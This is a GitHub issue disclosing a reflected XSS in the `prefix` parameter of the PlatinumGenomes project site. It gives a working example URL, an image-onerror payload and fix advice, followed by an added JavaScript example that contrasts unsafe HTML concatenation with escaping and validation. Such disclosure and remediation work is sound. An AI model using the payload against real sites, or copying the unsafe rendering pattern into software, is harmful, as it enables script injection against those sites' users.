Illumina / PlatinumGenomes

The Platinum Genomes Truthset
https://illumina.github.io/PlatinumGenomes
84 stars 9 forks

Found Reflected XSS On your Site #12

Open xElkomy opened 3 years ago

xElkomy commented 3 years ago

Hello Security Team, today I found a Reflected XSS on your own website.

Steps:-

1- Go to this URL: https://illumina.github.io/PlatinumGenomes/?prefix=
2- Add the XSS payload in the parameter `prefix`. Done, exploit.

Example:-

https://illumina.github.io/PlatinumGenomes/?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E

payload:

1'"<Img Src OnError=confirm('xElkomy')>

Fix:-

- Delete the reflection of the `prefix` parameter
- Filter input on arrival
- Encode data on output
- Use appropriate response headers (Content Security Policy)
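The "filter input on arrival" and "encode data on output" items from the fix list, as an added example that is not code from the PlatinumGenomes site or from the reporter. It assumes the page reads `prefix` from the query string and writes it into an element with id `prefix`; the allowlist pattern, the element id and all function names are assumptions. The constructed input is the query string from the report's own example URL.

```javascript
// Added example, not the PlatinumGenomes site's own code. Assumes the page
// reads `prefix` from location.search and writes it into the DOM.

// HTML-escape the five characters that change meaning in text or attribute
// context. Ampersand must go first so earlier replacements are not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Read the parameter the report points at. URLSearchParams percent-decodes
// the value, so this returns the raw markup the example URL carries.
function getPrefixParam(search) {
  return new URLSearchParams(search).get('prefix') ?? '';
}

// "Filter input on arrival": allowlist of what a legitimate prefix may contain.
// The character set and length cap are assumptions about this site.
const PREFIX_PATTERN = /^[A-Za-z0-9_.\/-]{0,128}$/;
function isValidPrefix(value) {
  return PREFIX_PATTERN.test(value);
}

// The pattern the report describes, in string form: the decoded parameter is
// concatenated straight into HTML, so markup in it is parsed as markup.
function renderPrefixUnsafe(prefix) {
  return '<span id="prefix">' + prefix + '</span>';
}

// "Encode data on output": the same template with the value escaped, so the
// browser renders it as text and never as an element or attribute.
function renderPrefixSafe(prefix) {
  return '<span id="prefix">' + escapeHtml(prefix) + '</span>';
}

// Browser-side equivalent: validate, then assign via textContent instead of
// innerHTML so the DOM does the encoding. `doc` is injectable for testing.
function showPrefixInDom(search, doc = typeof document !== 'undefined' ? document : null) {
  if (!doc) return null;
  const el = doc.getElementById('prefix');
  const value = getPrefixParam(search);
  el.textContent = isValidPrefix(value) ? value : '';
  return el.textContent;
}

// Constructed input: the query string from the report's example URL.
const REPORTED_QUERY = '?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E';
const REPORTED_PAYLOAD = '1\'"<Img Src OnError=confirm(\'xElkomy\')>';

if (typeof module !== 'undefined' && typeof require !== 'undefined' && require.main === module) {
  const raw = getPrefixParam(REPORTED_QUERY);
  console.log('decoded   :', raw);
  console.log('allowed?  :', isValidPrefix(raw));
  console.log('unsafe    :', renderPrefixUnsafe(raw));
  console.log('encoded   :', renderPrefixSafe(raw));
}
```

Run it with `node` to see the decoded parameter, the unsafe concatenation and the encoded output side by side. On the last fix item: a GitHub Pages site cannot set custom response headers, so a Content Security Policy there would have to be delivered as a `<meta http-equiv="Content-Security-Policy">` tag, and it is defence in depth behind the output encoding, not a substitute for it.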